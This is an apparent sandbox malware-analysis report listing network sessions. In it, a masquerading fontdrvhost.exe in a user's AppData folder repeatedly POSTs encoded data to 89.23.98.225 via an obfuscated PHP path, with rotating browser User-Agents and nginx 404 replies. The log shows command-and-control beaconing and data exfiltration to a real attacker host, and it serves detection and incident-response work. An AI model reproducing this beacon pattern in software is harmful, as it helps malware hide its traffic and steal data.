                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                  Mar 29, 2024 07:37:19.392754078 CET344OUTData Raw: 05 06 01 00 03 08 01 04 05 06 02 01 02 06 01 0a 00 01 05 0b 02 0d 03 00 07 03 0d 54 06 02 01 07 0a 02 06 00 07 06 06 01 0c 0a 05 06 07 57 06 04 07 04 0e 0b 0e 01 04 07 07 0e 06 0d 05 00 06 0a 00 05 0f 0e 04 0f 06 52 0c 53 0b 02 0d 56 0f 07 07 50
                                                                  Data Ascii: TWRSVPUR\L}U~`fNwLbXb[t@|UfYvo|sYy{xsi^TlActpO~u~V@Bzm~LbW


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.44973989.23.98.225807992C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 07:37:23.608653069 CET398OUTPOST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 336
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:37:23.851135015 CET696INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:37:23 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: keep-alive
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                  Mar 29, 2024 07:37:23.853965998 CET336OUTData Raw: 00 0b 01 02 06 08 01 04 05 06 02 01 02 05 01 07 00 04 05 0e 02 0c 03 0e 00 03 0f 07 05 04 03 03 0d 51 05 0b 02 54 06 0a 0f 03 04 06 05 03 04 02 06 06 0d 0b 0d 50 07 00 04 03 06 0c 07 0b 05 5b 03 07 0d 01 04 01 05 09 0f 01 0b 02 0a 00 0c 56 07 0c
                                                                  Data Ascii: QTP[VT\L~@^Ptaqbvt||~X`BlBhpoB{K{YzJh}hCvth}u~V@{Cn~_y


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.44974089.23.98.225807300C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 07:37:32.317095995 CET381OUTPOST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:37:32.560790062 CET696INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:37:32 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: keep-alive
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                  Mar 29, 2024 07:37:32.563004017 CET344OUTData Raw: 05 07 04 0c 06 0a 01 07 05 06 02 01 02 0d 01 04 00 04 05 0c 02 02 03 08 03 05 0e 54 07 01 06 00 0f 0f 03 0a 02 50 04 50 0e 01 05 56 04 01 06 01 07 04 0d 00 0a 06 04 07 05 0e 03 0c 07 01 06 0e 03 06 0c 00 06 0e 05 08 0c 54 0f 57 0f 04 0b 01 07 06
                                                                  Data Ascii: TPPVTWT\L}ShNjOc\v_uf`OUavtO~sk^{|sopT}npC`Iw]iO~V@{CT~\q


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.44974189.23.98.225803624C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 07:37:37.301199913 CET345OUTPOST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:37:37.543878078 CET294INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:37:37 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: keep-alive
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                  Mar 29, 2024 07:37:37.554234982 CET344OUTData Raw: 05 05 04 07 06 0c 01 07 05 06 02 01 02 03 01 05 00 0b 05 01 02 0d 03 08 03 0f 0f 51 06 53 01 57 0c 0f 05 01 00 53 03 0b 0c 01 04 04 05 54 07 00 03 03 0e 0d 0c 02 04 0b 06 57 04 07 06 02 05 00 00 05 0a 0c 04 07 06 52 0d 00 0b 05 0d 07 0d 05 04 04
                                                                  Data Ascii: QSWSTWRPQVQ\L~Yv`bvXv[p||T]tlpLMRxUHlYzJ|}^tpiO~V@{SPbq


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.44974289.23.98.225805572C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 07:37:41.258721113 CET381OUTPOST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:37:41.497651100 CET696INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:37:41 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: keep-alive
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                  Mar 29, 2024 07:37:41.499818087 CET344OUTData Raw: 00 02 01 01 03 0b 04 05 05 06 02 01 02 03 01 0a 00 0b 05 08 02 01 03 00 00 00 0d 0c 04 54 06 03 0a 00 03 09 02 50 04 55 0e 53 02 05 07 57 07 54 04 53 0d 00 0f 03 04 05 04 57 03 06 06 56 06 00 05 0a 0f 59 05 54 04 56 0d 05 0b 04 0d 50 0d 51 07 03
                                                                  Data Ascii: TPUSWTSWVYTVPQ]S\L~ci^wbj^ue||ouBwBtO~`cZoRsJo`b|~kPt^tAie~V@zmPA~bW


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.44974489.23.98.225807272C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 07:37:55.065041065 CET381OUTPOST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:37:55.308947086 CET696INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:37:55 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: keep-alive
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                  Mar 29, 2024 07:37:55.312774897 CET344OUTData Raw: 05 00 04 06 03 08 01 05 05 06 02 01 02 04 01 00 00 05 05 0d 02 0c 03 09 03 01 0d 51 04 52 01 50 0a 07 06 0a 07 02 07 04 0b 03 04 07 04 06 07 55 06 53 0e 0d 0d 50 05 06 01 07 03 04 07 02 05 00 02 06 0a 0e 06 03 06 51 0c 03 0c 53 0e 06 0f 01 02 02
                                                                  Data Ascii: QRPUSPQSV\L}Rhce\crSa[wP|oiOwB|s]_xll_{N~D|hA`|OiO~V@@xCnru


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.44974589.23.98.225807244C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 07:38:03.072562933 CET381OUTPOST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 336
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:38:03.309076071 CET696INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:38:03 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: keep-alive
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                  Mar 29, 2024 07:38:03.311923981 CET336OUTData Raw: 00 01 04 06 03 08 04 05 05 06 02 01 02 05 01 02 00 0b 05 0e 02 05 03 00 03 03 0a 00 07 03 02 09 0f 51 03 08 00 57 05 00 0c 53 06 01 00 00 04 07 04 50 0d 59 0d 03 07 07 06 03 07 07 06 51 04 0c 05 00 0f 0c 04 56 07 04 0f 57 0b 02 0e 01 0c 51 04 01
                                                                  Data Ascii: QWSPYQVWQU\U\L~Nsj`LSLvfpO~|SMtl|ksxll{pi^}t@vwl}e~V@@z}nNuy


                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  9192.168.2.44974689.23.98.22580
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 07:38:15.792608976 CET345OUTPOST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:38:16.050306082 CET294INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:38:15 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: keep-alive
